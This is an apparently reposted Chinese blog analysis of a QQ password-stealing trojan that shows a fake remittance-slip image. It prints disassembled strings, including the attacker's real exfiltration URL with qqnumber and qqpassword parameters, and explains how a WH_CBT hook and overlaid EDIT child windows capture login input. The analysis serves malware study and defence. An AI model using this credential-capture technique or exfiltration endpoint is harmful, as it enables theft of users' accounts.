文件結構：資料.exe?1.1?CrashRacoaF.fnr

運行后會彈出一個“匯款單”的圖片文件，嫣然是一個偽裝的木馬。這個圖片其實是在C盤下面的：C:\匯款單.jpg。

?

簡單分析文件：

資料.exe是主程序。

1.1是個dll，導出一個名叫“開始”的函數。這兩個文件都有加殼，可以輕松脫掉。

CrashRacoaF.fnr是個zip壓縮包，解壓后里面會有很多個文件，其實這里面的文件都一樣，原始名稱是shell.dll，

版本信息是：大連大有吳濤易語言軟件開發有限公司，產品名稱：操作系統界面功能支持庫。

可以知道這個是易語言的庫，就不用分析了，至于為什么帶有這么多個拷貝就不知道了。

?

如果把1.1文件刪除掉，直接運行資料.exe會提示1.1找不到，接著彈出：

只所以彈個這么挫的窗口出來，我想應該是給人的感覺是它沒有危害一樣。正是如此，主要功能都在1.1里面，我們先用OD查看下脫殼之后的字符串信息：

100048AD push 1.1007BFCF c:\匯款單.jpg
100048E3 push 1.1007BFDD rundll32.exe shimgvw.dll,imageview_fullscreen c:\匯款單.jpg
100049A1 push 1.1007C019 qq.exe
100049F9 push 1.1007C020 tm.exe
10005AF9 push 1.1007C02F qq2011
10005B12 push 1.1007C036 qq2010
10005B2B push 1.1007C03D tm2009
10005C2C mov eax,1.1007C044 edit
100061AF push 1.1007C02F qq2011
1000641C push 1.1007C036 qq2010
10006689 push 1.1007C03D tm2009
100072FF mov eax,1.1007C072 http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp
10007562 push 1.1007C0AF &qqpassword=
1000756C push 1.1007C0BC ?qqnumber=
10007B6A push 1.1007C0F3 mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BDF push 1.1007C0F3 mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BFE push 1.1007C126 http=
10007E74 push 1.1007C12C http/1.1
10007F73 push 1.1007C135 accept:
10007FAD push 1.1007C13E accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n\n
10008002 push 1.1007C1ED referer:
1000803C push 1.1007C1F7 \n\n
10008046 push 1.1007C1ED referer:
1000809B push 1.1007C1FA accept-language:
100080D5 push 1.1007C20C accept-language: zh-cn\n\n
10008126 push 1.1007C225 get
100081B6 push 1.1007C229 post
100081EC push 1.1007C22E content-type: application/x-www-form-urlencoded\n\n
10008267 push 1.1007C1F7 \n\n
1000826F push 1.1007C260 content-length:
10008409 mov ebx,1.1000DE80 j
10008614 push 1.1007C271 set-cookie:
10008738 push 1.1007C271 set-cookie:
100087EE push 1.10077241 =
1000881F push 1.1007C27E http://
10008A58 push 1.1007C27E http://

?

第一行信息可以看出，這個名為“匯款單”的圖片是怎么彈出來的了。

下面的信息是遍歷qq的主進程，存在的時候關閉并讓你重新登錄。

木馬創建一個WH_CBT鉤子：

0012F2E0 100679E0 /CALL 到 SetWindowsHookExA 來自 1.100679DA
0012F2E4 00000005 |HookType = WH_CBT
0012F2E8 100677B2 |Hookproc = 1.100677B2
0012F2EC 00000000 |hModule = NULL
0012F2F0 00000490 \ThreadID = 490

用來監視新運行的窗口，如果窗口標題是QQ2011，QQ2010，tm2009時則開始盜號。

盜號的方式比較巧妙，通過給QQ登錄框創建兩個子窗口來截獲輸入：

0012F9FC 10067ADA /CALL 到 CreateWindowExA 來自 1.10067AD4
0012FA00 00000000 |ExtStyle = 0
0012FA04 100ABD80 |Class = "EDIT"
0012FA08 100B2324 |WindowName = ""
0012FA0C 440100A0 |Style = WS_CHILD|WS_TABSTOP|WS_CLIPSIBLINGS|A0
0012FA10 00000001 |X = 1
0012FA14 00000000 |Y = 0
0012FA18 0000009B |Width = 9B (155.)
0012FA1C 0000001C |Height = 1C (28.)
0012FA20 000F01E6 |hParent = 000F01E6 (class='WTWindow')
0012FA24 00000064 |hMenu = 00000064 (window)
0012FA28 10000000 |hInst = 10000000
0012FA2C 00000000 \lParam = NULL

?

0012FA00 10067ADA /CALL 到 CreateWindowExA 來自 1.10067AD4
0012FA04 00000000 |ExtStyle = 0
0012FA08 0016A238 |Class = "Afx:10000000:b:10011:1900015:0"
0012FA0C 100B62F4 |WindowName = ""
0012FA10 44000000 |Style = WS_CHILD|WS_CLIPSIBLINGS
0012FA14 00000000 |X = 0
0012FA18 00000000 |Y = 0
0012FA1C 0000005D |Width = 5D (93.)
0012FA20 00000017 |Height = 17 (23.)
0012FA24 000F01E6 |hParent = 000F01E6 (class='WTWindow')
0012FA28 0000006E |hMenu = 0000006E (window)
0012FA2C 10000000 |hInst = 10000000
0012FA30 00000000 \lParam = NULL

最后調用下SetParent即可把子控件設置為QQ登錄框的子控件了。

創建好之后的QQ登錄框為：

其中紅色標記的窗口是木馬創建的，QQ登錄框外在表現毫無異樣。

后來那個創建的Edit的消息循環是在1.1中的，它作為原來密碼框的子控件，而且占據了很大的區域，使得它能截獲你的輸入。

“安全登錄”那個按鈕（實際上不是按鈕）處也是被木馬創建了一個控件，如果你qq號和密碼輸入完畢后肯定會點那個登錄的，

此時木馬創建的子控件就收到這個消息，說明你輸入好了。它再用GetWindowText或者WM_GETTEXT消息獲取上面的QQ號碼框中的QQ號碼，

連同截獲的密碼一同發往上面那個網址“http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp”中，即完成了盜號。

?

?

轉載于:https://www.cnblogs.com/daxingxing/archive/2011/12/02/2271997.html

總結

以上是生活随笔為你收集整理的一款QQ盗号木马分析的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。